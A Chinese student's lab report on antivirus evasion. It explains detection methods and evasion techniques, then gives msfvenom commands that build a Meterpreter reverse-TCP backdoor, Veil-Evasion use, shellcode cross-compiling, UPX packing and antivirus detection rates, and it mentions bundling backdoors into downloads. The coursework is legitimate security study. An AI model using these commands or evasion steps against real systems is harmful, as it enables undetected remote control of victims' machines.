代码改变世界

Exp 3 《网络对抗技术》免杀原理与实践 20154315 李惠航

2018-04-08 10:41  20154315李惠航  阅读(144)  评论(0编辑  收藏

一、基础知识问答

(1)杀软是如何检测出恶意代码的?

   1.基于特征码的检测:AV软件厂商通过检测一个可执行文件是否包含一段与特征码库中相匹配的特征码从而判断是否为恶意软件。

   2.启发式恶意软件检测:就是根据一个程序的特征和行为如果与恶意软件相似,就判定为恶意软件。

   3.基于行为的恶意软件检测:同启发式,启发式偏向于对程序的特征扫描,基于行为的则是多了对程序的行为监控。

(2)免杀是做什么?

   免杀就是使恶意软件能不被AV软件的检测出来,其本身安装的后门能够不被发现,成功存活下来。

(3)免杀的基本方法有哪些?

   1、改变特征码:

   如果是类似exe的可执行文件可以加壳,例如压缩壳

   如果是shellcode可以用encode进行编码或者用payload重新编译生成可执行文件

   如果是源代码可以用其他语言进行重写再编译(veil-evasion)

   2、改变行为:

   通讯方式:尽量使用反弹式连接、使用隧道技术、加密通讯数据

   操作模式:基于内存操作、减少对系统的修改、加入混淆作用的正常功能代码

   3、非常规方法:

   ①使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中。

   ②使用社工类攻击,诱骗目标关闭AV软件。

   ③纯手工打造一个恶意软件。

二、实验过程

1.使用Msfvenom编码器

 使用指令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.131 PORT=4315 -f exe > lihuihang.exe 生成一个可执行文件放到网站 http://www.virscan.org 上检测,结果如下:

 

可以发现检测率居然有46%,说明裸后门文件被发现的可能性还是很高的。

2.使用Veil-Evasion

2.1 veil-evasion和Metasploit类似,可以生成后门文件,但Linux里没有需要我们自己安装,用 sudo apt-get install veil-evasion 指令下载软件包,下载好后输入 veil 开始安装。

2.2 安装完成后自动进入 veil (下次想调用,输入 veil 即可)。

2.3 list 指令可以查看可使用的工具,选择 evasion (或者直接输入 use evasion )

 

2.4同上 list 可查看可使用的 payload 

 

使用 use 指令选择一个工具,这里我选择了 8 号,然后设置一下 LHOST和 LPORT ,输入generate 生成 exe 文件,命名一下就顺利生成文件。(我最开始选择的是 python ,然而要么是生成出错,要么是最后无法生成exe文件,可能是我安装过程有些问题,最后也只能放弃尝试使用 c 了)。

 

生成完成后去那个目录把文件复制到wIndows上检测。

3.C语言调用Shellcode

输入指令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.131 LPORT=4315 -f c 生成一个c语言格式的Shellcode数组

 

4.Linux平台交叉编译Windows应用

 将生成部分复制,粘贴到自己创建的一个c格式文件中,添加一个main函数保存退出。

 

使用指令 i686-w64-mingw32-g++ lhh.c -o lhh.exe 将创建的c格式文件转化为64位windows系统下的exe文件。

 

复制到windows系统下,自己创建一个c文件编译并运行,将复制的 wangzhuoran03.exe 替换掉其中的exe文件编译并运行,最后的这个exe文件就是我们的后门文件了。在Linux里用MSF监听(步骤参考上次实验),成功回连。

放到Virscan上扫描仍有7个AV报毒,17%的杀毒软件报告发现病毒。

5.升级版本

加壳
压缩壳UPX

 

直接用UPX将MSF直接生成的文件加壳。

 

上Virscan扫描,结果是:

 查杀率反而上升了!!!发现效果并不理想.........

三、离实战还缺些什么技术或步骤

1.我们要成功监听的话必须要靶机启动可执行文件,可以通过下载软件的时候可以捆绑到软件上,但是执行还是有一定难度的。

2.现在的杀毒软件的各种特征库更新的很快,要想达到实战还需要做到灵活更新。

四、实验心得与体会

这是网络对抗技术的第三次实验,通过这次实验,我对上次实验的理解更深了。我发现一些杀毒软件并没有太大作用,除了免杀以外还要进一步学习如何使靶机上当,将后门程序传到靶机上,并且成功在肉机上运行,这几个条件都是缺一不可的,还有待学习。这次实验再次提醒我维护系统安全真的非常重要,AV并不是万能的,那些查杀不出来的软件并非绝对安全,千万不能掉以轻心,防止被恶意程序和病毒入侵。